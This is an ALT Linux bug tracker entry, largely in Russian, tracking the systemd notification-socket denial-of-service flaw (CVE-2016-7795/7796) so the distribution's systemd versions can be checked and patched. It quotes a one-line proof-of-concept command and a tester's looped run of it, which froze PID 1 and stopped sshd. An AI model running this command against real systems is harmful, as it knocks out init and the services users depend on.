Bug 32545 - CVE-2016-7795, CVE-2016-7796: systemd: local denial-of-service attack via notification socket
: CVE-2016-7795, CVE-2016-7796: systemd: local denial-of-service attack via not...
Status: NEW
: ALT Linux Centaurus
(All bugs in ALT Linux Centaurus/Ошибки работы)
: не указана
: all Linux
: P3 normal
Assigned To:
:
:
:
:
:
  Show dependency tree
 
Reported: 2016-09-29 18:50 by
Modified: 2016-09-30 15:59 (History)


Attachments


Note

You need to log in before you can comment on or make changes to this bug.


Description From 2016-09-29 18:50:43
Источник: http://seclists.org/oss-sec/2016/q3/641

====================
systemd[1] fails an assertion in manager_invoke_notify_message[2] when
a zero-length message is received over its notification socket.
After failing the assertion, PID 1 hangs in the pause system call.
It is no longer possible to start and stop daemons or cleanly reboot
the system. Inetd-style services managed by systemd no longer accept
connections.

Since the notification socket, /run/systemd/notify, is world-writable,
this allows a local user to perform a denial-of-service attack against
systemd.

Proof-of-concept:

        NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

This vulnerability is present in all versions of systemd since at
least v209[3].

This has been reported to systemd.[4]

[1] https://github.com/systemd/systemd/
[2]
https://github.com/systemd/systemd/blob/b8fafaf4a1cffd02389d61ed92ca7acb1b8c739c/src/core/manager.c#L1666
[3]
https://github.com/systemd/systemd/commit/5ba6985b6c8ef85a8bcfeb1b65239c863436e75b#diff-ab78220e12703ee63fa1e6a2caa16bebR1325
[4] https://github.com/systemd/systemd/issues/4234
====================

Т.к. апстрим systemd поддерживает только релизную ветку (232) и два более
ранних релиза (231,230), необходимо проверить и, при необходимости, исправить
используемую (-ые) версию(-ии) systemd в продуктах ALT Linux. В комментариях к
[4] приведён более полный PoC, который позволяет воспроизвести проблему.

CVE пока не присвоено, но, судя по назначенному приоритету в баг-трекере
openSUSE (https://bugzilla.suse.com/show_bug.cgi?id=1001765), баг довольно
серьёзный и требует оперативного исправления. В апстриме проблема уже
исправлена.
------- Comment #1 From 2016-09-30 11:13:19 -------
Присвоенные CVE: CVE-2016-7795, CVE-2016-7796 Источник:
http://seclists.org/oss-sec/2016/q3/675
------- Comment #2 From 2016-09-30 15:05:28 -------
На виртуальной машине следующие результаты:

От root:

$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
>systemdlog

Broadcast message from systemd-journald@host-15.localdomain (Fri 2016-09-30
14:36:54 MSK):

systemd[1]: Caught <ABRT>, dumped core as pid 1594.


Broadcast message from systemd-journald@host-15.localdomain (Fri 2016-09-30
14:36:54 MSK):

systemd[1]: Freezing execution.

Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused


Перестают запускаться сервисы:

$ service sshd start
Failed to start sshd.service: Failed to activate service
'org.freedesktop.systemd1': timed out
See system logs and 'systemctl status sshd.service' for details.

От обычного пользователя:

$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
>systemdlog
bash: systemdlog: Отказано в доступе

Версия systemctl:
$ systemctl --version
systemd 230
+PAM +AUDIT +SELINUX -IMA -APPARMOR -SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP
+GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN

Версия ALT Linux:
$ uname -a
Linux host-15.localdomain 4.4.16-std-def-alt0.M80P.1 #1 SMP Thu Jul 28 03:44:48
UTC 2016 x86_64 GNU/Linux